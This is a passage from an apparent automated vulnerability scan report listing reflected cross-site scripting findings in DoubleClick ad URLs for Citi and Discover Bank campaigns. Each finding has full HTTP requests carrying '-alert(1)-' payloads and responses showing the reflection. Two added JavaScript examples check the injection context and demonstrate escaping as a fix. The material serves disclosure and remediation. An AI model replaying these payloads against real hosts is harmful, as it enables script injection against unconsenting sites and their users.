Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:19:22 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
5365865%3B4307-300/250%3B42625058/42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=116831d6cb'-alert(1)-'6f19826f6fc&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/3931861" target="_blank">
...[SNIP]...

1.59. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df183'-alert(1)-'09e6c884d7f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

Note that in the excerpt below the payload appears inside the double-quoted src attribute of an <iframe>, and the server appends its own click-through URL directly after it (…09e6c884d7fhttp://clk.atdmt.com/…), so the injected value and the default redirect target are concatenated inside the same attribute. A single-quote payload does not terminate that attribute; the script-string context asserted above must be confirmed against the full (snipped) response before the finding is rated as exploitable, although the unencoded reflection itself is confirmed.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=df183'-alert(1)-'09e6c884d7f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1950
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:21:49 GMT
Expires: Tue, 28 Jun 2011 02:21:49 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
3B%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=df183'-alert(1)-'09e6c884d7fhttp://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/4078877" target="_blank">
...[SNIP]...

1.60. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66b56'-alert(1)-'2689d224978 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

Note that although the heading names the sz parameter, the request below shows the payload appended to the _f value inside the click= URL (…de4020ba44ec66b56'-alert(1)-'…), and it is reflected in that position; the injection point is the click-through URL carried in the path, not the 300x250 size value. As in 1.58 and 1.59, the visible reflection sits inside the double-quoted src attribute of an <iframe>, where a single-quote payload does not break out of the attribute, so the script-string context must be confirmed against the full (snipped) response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec66b56'-alert(1)-'2689d224978&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:16:39 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
t/click%3Bh%3Dv8/3b34/f/d3/%2a/x%3B242474299%3B0-0%3B0%3B65365865%3B4307-300/250%3B42625058/42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec66b56'-alert(1)-'2689d224978&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/3768533" target="_blank"
...[SNIP]...
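
Findings 1.58 to 1.60 report a single-quoted JavaScript string context, while their response excerpts show the payload inside the double-quoted src attribute of an <iframe>; the findings that follow (1.61 onward) show the var imgurl = '...' shape that the summary text describes. The JavaScript below is an added example, not code from the XSS.CX report or from Burp, that locates the reflected marker in a response body and classifies the syntactic context it landed in, so that a scanner's context claim can be checked before a finding is rated. The two response fragments are constructed to mirror the report's snippets (the report's own bodies are snipped), and the marker string MARK, the function names and the simple boundary heuristics are assumptions of this example.

```javascript
'use strict';

// Added example, not code from the XSS.CX/Burp report: classify the syntactic
// context in which a reflected scanner marker lands, so that the summary
// "copied into a JavaScript string encapsulated in single quotation marks"
// can be checked against the response body itself. The marker is the random
// prefix Burp puts in front of its payload (e.g. "1d6cb" in
// 1d6cb'-alert(1)-'6f19826f6fc), which is unique enough to locate.

function reflectionContext(body, marker) {
  const at = body.indexOf(marker);
  if (at < 0) return { context: 'not-reflected', quote: null };
  const before = body.slice(0, at);
  const lower = before.toLowerCase();

  // Inside a <script> block if the last <script open tag comes after the last
  // </script close tag. (Inline event handlers are out of scope here.)
  const inScript = lower.lastIndexOf('<script') > lower.lastIndexOf('</script');

  // Look back only as far as the enclosing statement (script) or tag (markup):
  // an odd number of quote characters since that boundary means the marker sits
  // inside a literal delimited by that quote.
  const boundary = inScript
    ? Math.max(before.lastIndexOf('\n'), before.lastIndexOf(';'))
    : before.lastIndexOf('<');
  const seg = before.slice(boundary + 1);
  const singles = (seg.match(/'/g) || []).length;
  const doubles = (seg.match(/"/g) || []).length;
  const quote = singles % 2 ? "'" : doubles % 2 ? '"' : null;

  const context = inScript
    ? (quote ? 'js-string' : 'js-code')
    : (quote ? 'html-attribute' : 'html-text');
  return { context, quote };
}

// The report's payload form  X'-alert(1)-'Y  only terminates a literal that is
// itself delimited by a single quote and parsed as JavaScript. Anything else
// (for instance the double-quoted src attribute of an <iframe>) leaves the
// payload inert as written, so the finding needs a different payload or more
// evidence before it is called exploitable.
function assess(body, marker, payloadQuote = "'") {
  const r = reflectionContext(body, marker);
  if (r.context === 'js-string' && r.quote === payloadQuote) {
    return { confirmed: true, reason: `reflected inside a ${r.quote}-quoted JS string` };
  }
  return {
    confirmed: false,
    reason: `reflected in context ${r.context}` + (r.quote ? ` delimited by ${r.quote}` : ''),
  };
}

// Constructed response fragments (the report snips the real bodies), each with
// the same shape as the two kinds of reflection seen in this report: an
// <iframe src=".."> attribute and a  var imgurl = '..'  script literal.
const ATTR_RESPONSE =
  '<html><body><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;' +
  'u%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13&' +
  "_s=11683MARK'-alert(1)-'6f19826f6fc&redirect=http://clk.atdmt.com/go\" " +
  'target="_blank"></iframe></body></html>';

const JS_RESPONSE =
  '<html><body><script>\n' +
  "var dcwmode = 'opaque';\n" +
  "var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11&_o=15619&" +
  "_a=1822617MARK'-alert(1)-'d86740d32ed&_s=11683';\n" +
  "var target = '_blank';\n" +
  '</script></body></html>';

for (const [name, body] of [['iframe src', ATTR_RESPONSE], ['var imgurl', JS_RESPONSE]]) {
  const v = assess(body, 'MARK');
  console.log(`${name}: ${v.confirmed ? 'CONFIRMED' : 'unconfirmed'} (${v.reason})`);
}
```

Run with node: for the constructed inputs it reports the iframe reflection as unconfirmed and the script literal as confirmed. The heuristic is deliberately simple (it does not handle inline event handlers, quotes nested inside the literal, or a ';' inside the reflected URL ahead of the marker) and is a triage aid, not a parser. When it says unconfirmed, re-test with a payload matched to the actual delimiter (a double quote for the attribute case) rather than discard the finding.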

1.61. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15154'-alert(1)-'d86740d32ed was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=182261715154'-alert(1)-'d86740d32ed&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4401
Date: Tue, 28 Jun 2011 01:29:38 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
300x250_Static.gif';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=182261715154'-alert(1)-'d86740d32ed&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201105/index.aspx%3Fsrc%3DX1PMIA';
var target = '_blank';
var dcbgcolor = ''
...[SNIP]...
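
The response above shows the shape the summary describes: the click-through URL taken from the request is written straight into a single-quoted script literal (var imgurl = '...'), so the single quote in the payload ends the literal and -alert(1)- is evaluated as code. The JavaScript below is an added example, not code from the report or from the ad server it describes, that re-creates that emission in miniature, executes both the raw and an encoded version with alert() replaced by a recorder, and shows that JavaScript-string encoding (escaping backslash, both quote characters, line terminators and the <, > and / characters) keeps the value a single literal with its runtime value unchanged. The template text, function names and shortened parameter values are assumptions modelled on the snippet; the payload halves are the ones from this finding.

```javascript
'use strict';

// Added example, not code from the report or from the ad server it describes:
// a minimal re-creation of the  var imgurl = '<click URL>'  emission seen in
// finding 1.61, first spliced raw (the behaviour the finding documents) and
// then with an encoder for the JavaScript string context. The template text
// and the shortened parameter values are assumptions modelled on the snippet.

// Vulnerable: the click-through URL taken from the request is concatenated
// straight into script, so a single quote in it ends the literal.
function renderVulnerable(clickUrl) {
  return "var imgurl = '" + clickUrl + "';\nvar target = '_blank';";
}

// Encoder for data placed inside a JS string literal: backslash, both quote
// characters and the JS line terminators can end or break the literal; '<',
// '>' and '/' are escaped too so the value cannot form </script> and close the
// surrounding block. \uXXXX escapes are reversed by the JS parser, so the
// runtime value of the string is unchanged.
function jsStringEscape(value) {
  return String(value).replace(/[\\'"<>\/\r\n\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderHardened(clickUrl) {
  return "var imgurl = '" + jsStringEscape(clickUrl) + "';\nvar target = '_blank';";
}

// Execute the emitted script the way the browser would, with alert() replaced
// by a recorder so the caller can see whether the injected call fires.
function execute(script) {
  const alerts = [];
  const run = new Function('alert', script + '\nreturn imgurl;');
  const imgurl = run((x) => { alerts.push(x); });
  return { imgurl, alerts };
}

// Constructed click URL carrying the report's payload shape in the _a value
// (the marker halves are the ones from finding 1.61, other values shortened).
const PAYLOAD = "15154'-alert(1)-'d86740d32ed";
const CLICK_URL =
  'http://bn.xp1.ru4.com/bclick?_f=b521ae11&_o=15619&_a=1822617' + PAYLOAD +
  '&_s=11683&redirect=http%3a%2f%2ffb.discoverbank.com';

function demo() {
  return {
    vulnerable: execute(renderVulnerable(CLICK_URL)),
    hardened: execute(renderHardened(CLICK_URL)),
  };
}

const result = demo();
console.log('vulnerable: alert fired', result.vulnerable.alerts.length,
  'time(s), imgurl =', result.vulnerable.imgurl);
console.log('hardened:   alert fired', result.hardened.alerts.length,
  'time(s), imgurl intact =', result.hardened.imgurl === CLICK_URL);
```

With the raw template the emitted statement parses as 'http://…1822617' - alert(1) - 'd86740d32ed…', so the recorder fires once and imgurl ends up NaN; with the encoder it stays one literal and imgurl equals the original URL. The report's remediation is still the better first choice: keep the URL out of script entirely (for example HTML-attribute-encode it into a data attribute and read it from the DOM) and treat the escaping as a second layer. Whichever is done, the encoder must match the context: the same URL is placed in a double-quoted HTML attribute in findings 1.58 to 1.60, where HTML attribute encoding, not JavaScript string escaping, is the correct transform.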

1.62. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ba80'-alert(1)-'b278081406c was submitted in the _c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=18072551ba80'-alert(1)-'b278081406c&_pm=97956&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4921
Date: Tue, 28 Jun 2011 01:30:06 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
ivewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=18072551ba80'-alert(1)-'b278081406c&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201101/index_v1.aspx%3Facmpgn%3D111_X1_300x250_feel_X1FEELA%26src%3DX1FEELA';
var target = '_blank';
var dcb
...[SNIP]...

1.63. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6df45'-alert(1)-'3a47738f921 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=179021606df45'-alert(1)-'3a47738f921&_c=1807255&_pm=97956&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
